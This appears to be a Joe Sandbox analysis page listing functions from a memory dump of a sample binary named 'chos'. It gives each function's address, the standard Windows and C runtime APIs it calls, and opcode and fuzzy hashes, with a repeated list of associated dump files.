Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 064542a3fcfa7525ed12d26f6547477e9651809b8d17569ec2ecdb9cbe0c9103
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 34314520E8D243C5FE24BB64F8623B926B5AF85384F444634E94ECF2D7DE2EA4448F41

Function 00007FF666DE9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF666DE9A9C), ref: 00007FF666DE9AB1
TerminateProcess.KERNEL32(?,?,?,00007FF666DE9A9C), ref: 00007FF666DE9ABC
ExitProcess.KERNEL32 ref: 00007FF666DE9ACB

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 937936ef325274a24ffe4f5ee915a418428bb403bd67af5bb2d6319fe4b4e38e
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: E3D09E10F49B86C2EB143B70BC9947852716F88741F14563CC80B8E3D3DD3EE4494B00

Function 00007FF666DE01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE02E7

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 776034cbc19b2904321b08dd9fbb6d038ab8ad7387f795c2c35250e70809938a
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 3051B561A096C2C6E7649A65B400A7AA2B1BF44BE4F188734DE6DCF7C5CF3EE411CE50

Function 00007FF666DEC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF666DEC33D), ref: 00007FF666DEC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF666DEC33D), ref: 00007FF666DEC1FA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 12806d8c0824dee841d35aead9057e84ee64b4ec64e7a0c937b77118875a9501
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 5411C162B18A81C1DA208B65B814169B771BB85BF4F544331EE7D8F7E9DE7DD0518B00

Function 00007FF666DE5994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF666DE58A9), ref: 00007FF666DE59C7
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF666DE58A9), ref: 00007FF666DE59DD

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction ID: 0cd7a294a74dab0330b26af10c701832e15882092001d228c12352c8cd2d3a1b
Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction Fuzzy Hash: 00118C7265C682C2EA548B10B44117AF7B0EB847A1F500336FA99CDAD8EF3EE014CF00

Function 00007FF666DEA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9CE
GetLastError.KERNEL32(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9D8

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 79955e2cf9e0982ba65bec905c50c1e625c127610caa2a5eefa50cdb24d45bd3
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 1DE08C50F09683C3FF08ABB2B84513852B16FC8B40F484230D81DCE2A2EE3EA8858B10

Function 00007FF666DEABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF666DEAA45,?,?,00000000,00007FF666DEAAFA), ref: 00007FF666DEAC36
GetLastError.KERNEL32(?,?,?,00007FF666DEAA45,?,?,00000000,00007FF666DEAAFA), ref: 00007FF666DEAC40

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 552675e110eb2b940b2b8a8928a6906de9718c8e2fa8bb36ba7e62e27fe78fbc
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 5B218125F1C6C7C2EE945761B49027D96B29F84BA0F0C4339EA2ECF3C1CE6EA4458B01

Function 00007FF666DEBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DEBF44

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 77f2f9c0c3853e5df4dc99a11e1b25eaa2aec769d06f52d5773e5caefc843251
Instruction ID: deb9ab187b80cb0699a23465ee620cd23d70e8a1858640638cab54a280e6f7f2
Opcode Fuzzy Hash: 77f2f9c0c3853e5df4dc99a11e1b25eaa2aec769d06f52d5773e5caefc843251
Instruction Fuzzy Hash: AF419F32908682C7EA349A1AB541279B7B4EB55B94F144231DA9ECE6D1CF2FF402CF51

Function 00007FF666DD7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF666DD802A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
Instruction ID: e271347bc939990a7ace7ca3678d0fcd78ff9fbe818d0d09e3f14481ba10c727
Opcode Fuzzy Hash: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
Instruction Fuzzy Hash: F721A021B09692D6EA11BA2379047BA9661BF49BC4F8C5530EE0D8F786CE3EE041CF40

Function 00007FF666DEB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DEBA32

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 97565170941f52adea84567b27adddac53bb73bb27993713d94d50fdaa58996e
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: E7318F32E18682C5EB515B55A84177CA670AF40B94F424335E96D9F3D2CFBEF8418F21

Function 00007FF666DE99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF666DE99FF

Part of subcall function 00007FF666DE9AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF666DE9B1D
Part of subcall function 00007FF666DE9AF8: GetProcAddress.KERNEL32 ref: 00007FF666DE9B33
Part of subcall function 00007FF666DE9AF8: FreeLibrary.KERNEL32 ref: 00007FF666DE9B5A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 3dc7d1f082adc181e6822b891a62c9fe84c99ae233b9c76964ac579678a17ae7
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: B0215A32E06682CAEB248F64E4846BC73B4EB44718F444636D62D8EAD5DF79D584CB40

Function 00007FF666DE6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE5F69

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: ca6e3ac392cca43c81ad26af7fd70ae6e91e97b7dba70394b086d99edaaa4fb8
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 3D113E32A1C682C2EA619F51B41017EE2B4AF85BC0F454231EB4D9FA96DF7FD4508F50

Function 00007FF666DF63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF63E7

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 0db10f5dc269a30cbcd887a5a18ccbd81be5eb5c3bda12b557aa55a101d4ce60
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 4621307261868286D7619F19E45037D76B0AB85B54F584334E69D8EAD9DF3ED4008F00

Function 00007FF666DE042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE0480

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 2a7960a813f0a6020f0fd09cac3f8d633c62f93649b5e47e89b5905d036a49e5
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: BC01A521A08782C1EA04DF526901069E6B1AF99FE0F4C4732EE5C9FBD6DE3ED1218B40

Function 00007FF666DE7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE7FAA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: a05049cf0cfa4af4a9aea89ce566bc125b1f92c3eadcdef7c374831e7f4e1842
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: 92015720E0D2C3D4FAA06B65B901179E2B0AF547A4F544735EA1CCE6C7DF2FB481CA11

Function 00007FF666DE82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE82C1

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 661a0b73f2460a7a44a9b6599a4df17b1741effef050edc1956806445c1d43d3
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 09E012A0E19687D7F7643AB4698617991305FA5740F458730E908EE2C3DE2FB8495F31

Function 00007FF666DEEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF666DEB39A,?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA), ref: 00007FF666DEEC5D

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 15b48fe8f295c982de290ad6af3a1da415dcc30766c55996a7ed86a4f5e21820
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: DEF01D54B0A6C7C1FE555B62B8512B59AB15F89F80F4C5730D90ECE3D2DE2EE4818A20

Function 00007FF666DED66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF666DE0D00,?,?,?,00007FF666DE236A,?,?,?,?,?,00007FF666DE3B59), ref: 00007FF666DED6AA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

